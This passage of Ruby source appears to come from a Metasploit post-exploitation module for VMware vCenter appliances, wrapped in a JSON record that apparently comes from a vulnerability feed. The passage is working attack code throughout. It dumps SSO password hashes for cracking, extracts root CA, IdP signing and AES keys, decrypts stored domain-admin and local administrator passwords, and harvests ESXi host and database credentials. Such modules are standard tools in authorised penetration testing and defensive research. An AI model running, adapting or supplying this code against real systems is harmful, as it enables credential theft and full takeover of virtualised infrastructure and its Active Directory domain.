'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: base_fqdn\n }\n\n store_valid_credential(user: bind_dn, private: bind_pw, service_data: extra_service_data)\n\n get_aes_keys_from_host\n end\n\n def vmdir_dump\n print_status('Dumping vmdir schema to LDIF and storing to loot...')\n vmdir_ldif = get_ldif_contents(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)\n if vmdir_ldif.nil?\n print_error('Error processing LDIF file')\n return\n end\n\n p = store_loot('vmdir', 'LDIF', rhost, vmdir_ldif, 'vmdir.ldif', 'vCenter vmdir LDIF dump')\n print_good(\"LDIF Dump: #{p}\")\n\n print_status('Processing vmdir LDIF (this may take several minutes)')\n ldif_file = ::File.open(p, 'rb')\n ldif_data = Net::LDAP::Dataset.read_ldif(ldif_file)\n\n print_status('Processing LDIF entries')\n entries = ldif_data.to_entries\n\n print_status('Processing SSO account 
hashes')\n vmware_sso_hash_entries = entries.select { |entry| entry[:userpassword].any? }\n process_hashes(vmware_sso_hash_entries)\n\n print_status('Processing SSO identity sources')\n vmware_sso_id_entries = entries.select { |entry| entry[:vmwSTSConnectionStrings].any? }\n process_sso_providers(vmware_sso_id_entries)\n\n if datastore['DUMP_LIC']\n print_status('Extract licenses from vCenter platform')\n vmware_license_entries = entries.select { |entry| entry[:vmwLicSvcLicenseSerialKeys].any? }\n get_vc_licenses(vmware_license_entries)\n end\n end\n\n def vmafd_dump\n if vcenter_infrastructure\n get_vmca_cert\n get_idp_creds\n end\n\n vecs_stores = get_vecs_stores\n return if vecs_stores.nil?\n\n if vecs_stores.empty?\n print_error('Empty vecs-cli store list returned from vCenter')\n return\n end\n\n vecs_stores.each do |vecs_store|\n vecs_entries = get_vecs_entries(vecs_store)\n vecs_entries.each do |vecs_entry|\n next unless vecs_entry['Entry type'] == 'Private Key'\n\n get_vecs_entry(vecs_store, vecs_entry)\n end\n end\n end\n\n def get_vecs_entry(store_name, vecs_entry)\n store_label = store_name.upcase\n\n vprint_status(\"Extract #{store_label} key\")\n key = get_vecs_private_key(store_name, vecs_entry['Alias'])\n if key.nil?\n print_bad(\"Could not extract #{store_label} private key\")\n else\n p = store_loot(vecs_entry['Alias'], 'PEM', rhost, key.to_pem.to_s, \"#{store_label}.key\", \"vCenter #{store_label} Private Key\")\n print_good(\"#{store_label} Key: #{p}\")\n end\n\n vprint_status(\"Extract #{store_label} certificate\")\n cert = validate_x509_cert(vecs_entry['Certificate'])\n if cert.nil?\n print_bad(\"Could not extract #{store_label} certificate\")\n return\n end\n p = store_loot(vecs_entry['Alias'], 'PEM', rhost, cert.to_pem.to_s, \"#{store_label}.pem\", \"vCenter #{store_label} Certificate\")\n print_good(\"#{store_label} Cert: #{p}\")\n\n unless key.nil?\n update_keystore(cert, key)\n end\n end\n\n def get_vmca_cert\n vprint_status('Extract 
VMCA_ROOT key')\n\n unless file_exist?('/var/lib/vmware/vmca/privatekey.pem') && file_exist?('/var/lib/vmware/vmca/root.cer')\n print_error('Could not locate VMCA_ROOT keypair')\n return\n end\n\n vmca_key_b64 = read_file('/var/lib/vmware/vmca/privatekey.pem')\n\n vmca_key = validate_pkey(vmca_key_b64)\n if vmca_key.nil?\n print_error('Could not extract VMCA_ROOT private key')\n return\n end\n\n p = store_loot('vmca', 'PEM', rhost, vmca_key, 'VMCA_ROOT.key', 'vCenter VMCA root CA private key')\n print_good(\"VMCA_ROOT key: #{p}\")\n\n vprint_status('Extract VMCA_ROOT cert')\n vmca_cert_b64 = read_file('/var/lib/vmware/vmca/root.cer')\n\n vmca_cert = validate_x509_cert(vmca_cert_b64)\n if vmca_cert.nil?\n print_error('Could not extract VMCA_ROOT certificate')\n return\n end\n\n unless vmca_cert.check_private_key(vmca_key)\n print_error('VMCA_ROOT certificate and private key mismatch')\n return\n end\n\n p = store_loot('vmca', 'PEM', rhost, vmca_cert, 'VMCA_ROOT.pem', 'vCenter VMCA root CA certificate')\n print_good(\"VMCA_ROOT cert: #{p}\")\n\n update_keystore(vmca_cert, vmca_key)\n end\n\n # Shamelessly borrowed from vmware_vcenter_vmdir_ldap.rb\n def process_hashes(entries)\n if entries.empty?\n print_warning('No password hashes found')\n return\n end\n\n service_details = {\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: '389',\n protocol: 'tcp',\n service_name: 'vmdir/ldap'\n }\n\n entries.each do |entry|\n # This is the \"username\"\n dn = entry.dn\n\n # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/middle-layer/password.c#L32-L76\n type, hash, salt = entry[:userpassword].first.unpack('CH128H32')\n\n case type\n when 1\n unless hash.length == 128\n vprint_error(\"Type #{type} hash length is not 128 digits (#{dn})\")\n next\n end\n\n unless salt.length == 32\n vprint_error(\"Type #{type} salt length is not 32 digits (#{dn})\")\n next\n end\n\n # 
https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197\n john_hash = \"$dynamic_82$#{hash}$HEX$#{salt}\"\n else\n vprint_error(\"Hash type #{type.inspect} is not supported yet (#{dn})\")\n next\n end\n\n print_good(\"vSphere SSO User Credential: #{dn}:#{john_hash}\")\n\n create_credential(service_details.merge(\n username: dn,\n private_data: john_hash,\n private_type: :nonreplayable_hash,\n jtr_format: Metasploit::Framework::Hashes.identify_hash(john_hash)\n ))\n end\n end\n\n def process_sso_providers(entries)\n if entries.empty?\n print_warning('No SSO ID provider information found')\n return\n end\n\n if entries.is_a?(String)\n entries = entries.split(\"\\n\")\n end\n\n entries.each do |entry|\n sso_prov_type = entry[:vmwSTSProviderType].first\n sso_conn_str = entry[:vmwSTSConnectionStrings].first\n sso_user = entry[:vmwSTSUserName].first\n\n # On vCenter 7.x instances the tenant AES key was always Base64 encoded vs. plaintext, and vmwSTSPassword was missing from the LDIF dump.\n # It appears that vCenter 7.x does not return vmwSTSPassword even with appropriate LDAP flags - this is not like prior versions.\n # The data can still be extracted directly with ldapsearch syntax below which works in all versions, but is a PITA.\n vmdir_user_sso_pass = cmd_exec(\"#{ldapsearch_bin} -h #{vc_psc_fqdn} -LLL -p 389 -b \\\"cn=#{base_fqdn},cn=Tenants,cn=IdentityManager,cn=Services,#{base_dn}\\\" -D \\\"#{bind_dn}\\\" -w #{shell_bind_pw} \\\"(&(objectClass=vmwSTSIdentityStore)(vmwSTSConnectionStrings=#{sso_conn_str}))\\\" \\\"vmwSTSPassword\\\" | awk -F 'vmwSTSPassword: ' '{print $2}'\").split(\"\\n\").last\n sso_pass = tenant_aes_decrypt(vmdir_user_sso_pass)\n\n sso_domain = entry[:vmwSTSDomainName].first\n\n sso_conn_uri = URI.parse(sso_conn_str)\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: sso_conn_uri.port,\n service_name: sso_conn_uri.scheme,\n protocol: 'tcp',\n workspace_id: 
myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: sso_domain\n }\n\n store_valid_credential(user: sso_user, private: sso_pass, service_data: extra_service_data)\n print_status('Found SSO Identity Source Credential:')\n print_good(\"#{sso_prov_type} @ #{sso_conn_str}:\")\n print_good(\"\\t SSOUSER: #{sso_user}\")\n print_good(\"\\t SSOPASS: #{sso_pass}\")\n print_good(\"\\tSSODOMAIN: #{sso_domain}\")\n end\n end\n\n def get_aes_keys_from_host\n print_status('Extracting tenant and vpx AES encryption key...')\n\n tenant_key = get_aes_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)\n fail_with(Msf::Exploit::Failure::Unknown, 'Error extracting tenant and vpx AES encryption key') if tenant_key.nil?\n\n tenant_key.each do |aes_key|\n aes_key_len = aes_key.length\n # our first case is to process it out\n case aes_key_len\n when 16\n self.vc_tenant_aes_key = aes_key\n self.vc_tenant_aes_key_hex = vc_tenant_aes_key.unpack('H*').first\n vprint_status(\"vCenter returned a plaintext AES key: #{aes_key}\")\n when 24\n self.vc_tenant_aes_key = Base64.strict_decode64(aes_key)\n self.vc_tenant_aes_key_hex = Base64.strict_decode64(aes_key).unpack('H*').first\n vprint_status(\"vCenter returned a Base64 AES key: #{aes_key}\")\n when 64\n self.vc_sym_key = aes_key.scan(/../).map(&:hex).pack('C*')\n self.vc_sym_key_raw = aes_key\n print_good('vSphere vmware-vpx AES encryption')\n print_good(\"\\tHEX: #{aes_key}\")\n else\n print_error(\"Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got #{aes_key_len}\")\n next\n end\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: base_fqdn\n }\n # our second case is to store it correctly\n case aes_key_len\n when 16, 24\n 
print_good('vSphere Tenant AES encryption')\n print_good(\"\\tKEY: #{vc_tenant_aes_key}\")\n print_good(\"\\tHEX: #{vc_tenant_aes_key_hex}\")\n\n store_valid_credential(user: 'STS AES key', private: vc_tenant_aes_key, service_data: extra_service_data.merge({\n port: 389,\n service_name: 'ldap'\n }))\n when 64\n store_valid_credential(user: 'VPX AES key', private: vc_sym_key_raw, service_data: extra_service_data.merge({\n port: 5432,\n service_name: 'psql'\n }))\n end\n end\n end\n\n def tenant_aes_decrypt(b64)\n # https://github.com/vmware/lightwave/blob/master/vmidentity/idm/server/src/main/java/com/vmware/identity/idm/server/CryptoAESE.java#L44-L45\n ciphertext = Base64.strict_decode64(b64)\n decipher = OpenSSL::Cipher.new('aes-128-ecb')\n decipher.decrypt\n decipher.padding = 0\n decipher.key = vc_tenant_aes_key\n return (decipher.update(ciphertext) + decipher.final).delete(\"\\000\")\n rescue StandardError => e\n elog('Error performing tenant_aes_decrypt', error: e)\n fail_with(Msf::Exploit::Failure::Unknown, 'Error performing tenant_aes_decrypt')\n end\n\n def update_keystore(public_key, private_key)\n if public_key.is_a? String\n cert = validate_x509_cert(public_key)\n else\n cert = public_key\n end\n if private_key.is_a? 
String\n key = validate_pkey(private_key)\n else\n key = private_key\n end\n cert_thumbprint = OpenSSL::Digest::SHA1.new(cert.to_der).to_s\n keystore[cert_thumbprint] = key\n rescue StandardError => e\n elog('Error updating module keystore', error: e)\n fail_with(Msf::Exploit::Failure::Unknown, 'Error updating module keystore')\n end\n\n def get_idp_creds\n vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP')\n idp_keys = get_idp_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)\n if idp_keys.nil?\n print_error('Error processing IdP trusted certificate private key')\n return\n end\n\n idp_certs = get_idp_certs(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)\n if idp_certs.nil?\n print_error('Error processing IdP trusted certificate chain')\n return\n end\n\n vprint_status('Parsing vmwSTSTenantCredential certificates and keys')\n\n # vCenter vmdir stores the STS IdP signing credential under the following DN:\n # cn=TenantCredential-1,cn=<sso domain>,cn=Tenants,cn=IdentityManager,cn=Services,<root dn>\n\n sts_cert = nil\n sts_key = nil\n sts_pem = nil\n idp_keys.each do |stskey|\n idp_certs.each do |stscert|\n next unless stscert.check_private_key(stskey)\n\n sts_cert = stscert.to_pem.to_s\n sts_key = stskey.to_pem.to_s\n if validate_sts_cert(sts_cert)\n vprint_status('Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate')\n else # Query IDM to compare our extracted cert with the IDM advertised cert\n print_warning('Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work')\n end\n sts_pem = \"#{sts_key}#{sts_cert}\"\n end\n end\n\n unless sts_pem # We were unable to link a public and private key together\n print_error('Unable to associate IdP certificate and private key')\n return\n end\n\n p = store_loot('idp', 'application/x-pem-file', rhost, sts_key, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')\n print_good(\"SSO_STS_IDP key: #{p}\")\n\n p 
= store_loot('idp', 'application/x-pem-file', rhost, sts_cert, 'SSO_STS_IDP.pem', 'vCenter SSO IdP certificate')\n print_good(\"SSO_STS_IDP cert: #{p}\")\n\n update_keystore(sts_cert, sts_key)\n end\n\n def get_vc_licenses(entries)\n if entries.empty?\n print_warning('No vSphere Licenses Found')\n return\n end\n\n if entries.is_a?(String)\n entries = entries.split(\"\\n\")\n end\n\n entries.each do |entry|\n vc_lic_name = entry[:vmwLicSvcLicenseName].first\n vc_lic_type = entry[:vmwLicSvcLicenseType].first\n vc_lic_key = entry[:vmwLicSvcLicenseSerialKeys].first\n vc_lic_label = \"#{vc_lic_name} #{vc_lic_type}\"\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: 443,\n service_name: 'https',\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: base_fqdn\n }\n\n store_valid_credential(user: vc_lic_label, private: vc_lic_key, service_data: extra_service_data)\n print_good(\"\\t#{vc_lic_label}: #{vc_lic_key}\")\n end\n end\n\n def enum_vm_cust_spec\n vpx_customization_specs = get_vpx_customization_spec(shell_vcdb_pass, vcdb_user, vcdb_name)\n\n if vpx_customization_specs.nil?\n print_warning('No vpx_customization_spec entries evident')\n return\n end\n\n vpx_customization_specs.each do |spec|\n xmldoc = vpx_customization_specs[spec]\n\n unless (enc_cert_len = xmldoc.at_xpath('/ConfigRoot/encryptionKey/_length').text.to_i)\n print_error(\"Could not determine DER byte length for vpx_customization_spec '#{spec}'\")\n next\n end\n\n enc_cert_der = []\n der_idx = 0\n\n print_status('Validating data encipherment key')\n while der_idx <= enc_cert_len - 1\n enc_cert_der << xmldoc.at_xpath(\"/ConfigRoot/encryptionKey/e[@id=#{der_idx}]\").text.to_i\n der_idx += 1\n end\n\n enc_cert = validate_x509_cert(enc_cert_der.pack('C*'))\n if enc_cert.nil?\n print_error(\"Invalid encryption certificate for vpx_customization_spec '#{spec}'\")\n 
next\n end\n\n enc_cert_thumbprint = OpenSSL::Digest::SHA1.new(enc_cert.to_der).to_s\n vprint_status(\"Secrets for '#{spec}' were encrypted using public certificate with SHA1 digest #{enc_cert_thumbprint}\")\n\n unless (enc_keystore_entry = keystore[enc_cert_thumbprint])\n print_warning('Could not associate encryption public key with any of the private keys extracted from vCenter, skipping')\n next\n end\n\n vc_cipher_key = validate_pkey(enc_keystore_entry)\n if vc_cipher_key.nil?\n print_error(\"Could not access private key for VM Guest Customization Template '#{spec}', cannot decrypt\")\n next\n end\n\n unless enc_cert.check_private_key(vc_cipher_key)\n print_error(\"vCenter private key does not associate with public key for VM Guest Customization Template '#{spec}', cannot decrypt\")\n next\n end\n\n key_digest = OpenSSL::Digest::SHA1.new(vc_cipher_key.to_der).to_s\n vprint_status(\"Decrypt using #{vc_cipher_key.n.num_bits}-bit #{vc_cipher_key.oid} SHA1: #{key_digest}\")\n\n # Check for static local machine password\n if (sysprep_element_unattend = xmldoc.at_xpath('/ConfigRoot/identity/guiUnattended'))\n next unless sysprep_element_unattend.at_xpath('//guiUnattended/password/plainText')\n\n secret_is_plaintext = sysprep_element_unattend.xpath('//guiUnattended/password/plainText').text\n\n case secret_is_plaintext.downcase\n when 'true'\n secret_plaintext = sysprep_element_unattend.xpath('//guiUnattended/password/value').text\n when 'false'\n secret_ciphertext = sysprep_element_unattend.xpath('//guiUnattended/password/value').text\n ciphertext_bytes = Base64.strict_decode64(secret_ciphertext.to_s).reverse\n secret_plaintext = vc_cipher_key.decrypt(ciphertext_bytes, rsa_padding_mode: 'pkcs1').delete(\"\\000\")\n else\n print_error(\"Malformed XML received from vCenter for VM Guest Customization Template '#{spec}'\")\n next\n end\n print_status(\"Initial administrator account password found for vpx_customization_spec '#{spec}':\")\n print_good(\"\\tInitial Admin 
PW: #{secret_plaintext}\")\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: 445,\n protocol: 'tcp',\n service_name: 'Windows',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: '.'\n }\n\n store_valid_credential(user: '(local built-in administrator)', private: secret_plaintext, service_data: extra_service_data)\n end\n\n # Check for account used for domain join\n next unless (domain_element_unattend = xmldoc.at_xpath('//identification'))\n next unless domain_element_unattend.at_xpath('//identification/domainAdminPassword/plainText')\n\n secret_is_plaintext = domain_element_unattend.xpath('//identification/domainAdminPassword/plainText').text\n domain_user = domain_element_unattend.xpath('//identification/domainAdmin').text\n domain_base = domain_element_unattend.xpath('//identification/joinDomain').text\n\n case secret_is_plaintext.downcase\n when 'true'\n secret_plaintext = sysprep_element_unattend.xpath('//identification/domainAdminPassword/value').text\n when 'false'\n secret_ciphertext = sysprep_element_unattend.xpath('//identification/domainAdminPassword/value').text\n ciphertext_bytes = Base64.strict_decode64(secret_ciphertext.to_s).reverse\n secret_plaintext = vc_cipher_key.decrypt(ciphertext_bytes, rsa_padding_mode: 'pkcs1').delete(\"\\000\")\n else\n print_error(\"Malformed XML received from vCenter for VM Guest Customization Template '#{spec}'\")\n next\n end\n\n print_status(\"AD domain join account found for vpx_customization_spec '#{spec}':\")\n\n case domain_base.include?('.')\n when true\n print_good(\"\\tAD User: #{domain_user}@#{domain_base}\")\n when false\n print_good(\"\\tAD User: #{domain_base}\\\\#{domain_user}\")\n end\n print_good(\"\\tAD Pass: #{secret_plaintext}\")\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: 445,\n protocol: 'tcp',\n service_name: 'Windows',\n workspace_id: 
myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: domain_base\n }\n\n store_valid_credential(user: domain_user, private: secret_plaintext, service_data: extra_service_data)\n end\n end\n\n def enum_vpx_user_creds\n vpxuser_rows = get_vpx_users(shell_vcdb_pass, vcdb_user, vcdb_name, vc_sym_key)\n\n if vpxuser_rows.nil?\n print_warning('No ESXi hosts attached to this vCenter system')\n return\n end\n\n vpxuser_rows.each do |user|\n print_good(\"ESXi Host #{user['fqdn']} [#{user['ip']}]\\t LOGIN: #{user['user']} PASS: #{user['password']}\")\n\n extra_service_data = {\n address: user['ip'],\n port: 22,\n protocol: 'tcp',\n service_name: 'ssh',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: user['fqdn']\n }\n\n # XXX is this always root? store_valid_credential(user: 'root', private: user['password'], service_data: extra_service_data)\n store_valid_credential(user: user['user'], private: user['password'], service_data: extra_service_data)\n end\n end\n\n def get_db_creds\n db_properties = process_vcdb_properties_file\n\n self.vcdb_name = db_properties['name']\n self.vcdb_user = db_properties['username']\n self.vcdb_pass = db_properties['password']\n\n self.shell_vcdb_pass = \"'#{vcdb_pass.gsub(\"'\") { \"\\\\'\" }}'\"\n\n print_good(\"\\tVCDB Name: #{vcdb_name}\")\n print_good(\"\\tVCDB User: #{vcdb_user}\")\n print_good(\"\\tVCDB Pass: #{vcdb_pass}\")\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: 5432,\n service_name: 'psql',\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: vcdb_name\n }\n\n store_valid_credential(user: vcdb_user, private: vcdb_pass, service_data: extra_service_data)\n print_status('Checking for VPX 
Users')\n creds = query_vpx_creds(vcdb_pass, vcdb_user, vcdb_name, vc_sym_key_raw)\n if creds.nil?\n print_bad('No VPXUSER entries were found')\n return\n end\n creds.each do |cred|\n extra_service_data = {\n address: cred['ip_address'],\n service_name: 'vpx',\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: vcdb_name\n }\n if cred.key? 'decrypted_password'\n print_good(\"VPX Host creds found: #{cred['user']}, #{cred['decrypted_password']} for #{cred['ip_address']}\")\n credential_data = {\n username: cred['user'],\n private_data: cred['decrypted_password'],\n private_type: :password\n }.merge(extra_service_data)\n else\n print_good(\"VPX Host creds found: #{cred['user']}, #{cred['password_hash']} for #{cred['ip_address']}\")\n credential_data = {\n username: cred['user'],\n private_data: cred['password_hash'],\n private_type: :nonreplayable_hash\n # this is encrypted, not hashed, so no need for the following line, leaving it as a note\n # jtr_format: Metasploit::Framework::Hashes.identify_hash(cred['password_hash'])\n }.merge(extra_service_data)\n end\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(extra_service_data)\n\n create_credential_login(login_data)\n end\n end\n\n def validate_sts_cert(test_cert)\n cert = validate_x509_cert(test_cert)\n return false if cert.nil?\n\n vprint_status('Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter')\n\n idm_cmd = cmd_exec(\"curl -f -s http://localhost:7080/idm/tenant/#{base_fqdn}/certificates?scope=TENANT\")\n\n if idm_cmd.blank?\n print_error('Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM')\n return false\n end\n\n if (idm_json = JSON.parse(idm_cmd).first)\n idm_json['certificates'].each do |idm|\n cert_verify = 
validate_x509_cert(idm['encoded'])\n if cert_verify.nil?\n print_error('Invalid x509 certificate extracted from IDM!')\n return false\n end\n next unless cert == cert_verify\n\n return true\n end\n else\n print_error('Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter')\n return false\n end\n\n print_error('No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/')\n false\n end\n\n def validate_target\n if vcenter_management\n vc_db_type = get_database_type\n unless vc_db_type == 'embedded'\n fail_with(Msf::Exploit::Failure::NoTarget, \"This module only supports embedded PostgreSQL, appliance reports DB type '#{vc_db_type}'\")\n end\n\n unless command_exists?(psql_bin)\n fail_with(Msf::Exploit::Failure::NoTarget, \"Could not find #{psql_bin}\")\n end\n end\n\n self.vcenter_fqdn = get_fqdn\n if vcenter_fqdn.nil?\n print_bad('Could not determine vCenter DNS FQDN')\n self.vcenter_fqdn = ''\n end\n\n vsphere_machine_ipv4 = get_ipv4\n if vsphere_machine_ipv4.nil? || !Rex::Socket.is_ipv4?(vsphere_machine_ipv4)\n print_bad('Could not determine vCenter IPv4 address')\n else\n print_status(\"Appliance IPv4: #{vsphere_machine_ipv4}\")\n end\n\n self.vc_psc_fqdn = get_platform_service_controller(vc_type_management)\n os, build = get_os_version\n\n print_status(\"Appliance Hostname: #{vcenter_fqdn}\")\n print_status(\"Appliance OS: #{os}-#{build}\")\n host_info = {\n host: session.session_host,\n name: vcenter_fqdn,\n os_flavor: os,\n os_sp: build,\n purpose: 'server',\n info: 'vCenter Server'\n }\n if os.downcase.include? 
'linux'\n host_info[:os_name] = 'linux'\n end\n report_host(host_info)\n end\n\n def get_vcsa_version\n self.vc_type_embedded = false\n self.vc_type_infrastructure = false\n self.vc_type_management = false\n\n vcsa_type = get_deployment_type\n case vcsa_type\n when nil\n fail_with(Msf::Exploit::Failure::BadConfig, 'Could not find /etc/vmware/deployment.node.type')\n when 'embedded' # Integrated vCenter and PSC\n self.vc_deployment_type = 'vCenter Appliance (Embedded)'\n self.vc_type_embedded = true\n when 'infrastructure' # PSC only\n self.vc_deployment_type = 'vCenter Platform Service Controller'\n self.vc_type_infrastructure = true\n when 'management' # vCenter only\n self.vc_deployment_type = 'vCenter Appliance (Management)'\n self.vc_type_management = true\n else\n fail_with(Msf::Exploit::Failure::Unknown, \"Unable to determine appliance deployment type returned from server: #{vcsa_type}\")\n end\n\n if vcenter_management\n self.vcsa_build = get_vcenter_build\n end\n\n print_status(vcsa_build)\n print_status(vc_deployment_type)\n end\n\n private\n\n attr_accessor :base_dn, :base_fqdn, :bind_dn, :bind_pw, :keystore, :shell_bind_pw, :shell_vcdb_pass, :vc_deployment_type, :vc_psc_fqdn, :vc_sym_key, :vc_sym_key_raw, :vc_tenant_aes_key, :vc_tenant_aes_key_hex, :vc_type_embedded, :vc_type_infrastructure, :vc_type_management, :vcdb_name, :vcdb_pass, :vcdb_user, :vcenter_fqdn, :vcsa_build\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/vcenter_secrets_dump.rb", "cvss": {"score": 0.0, "vector": "NONE"}}]}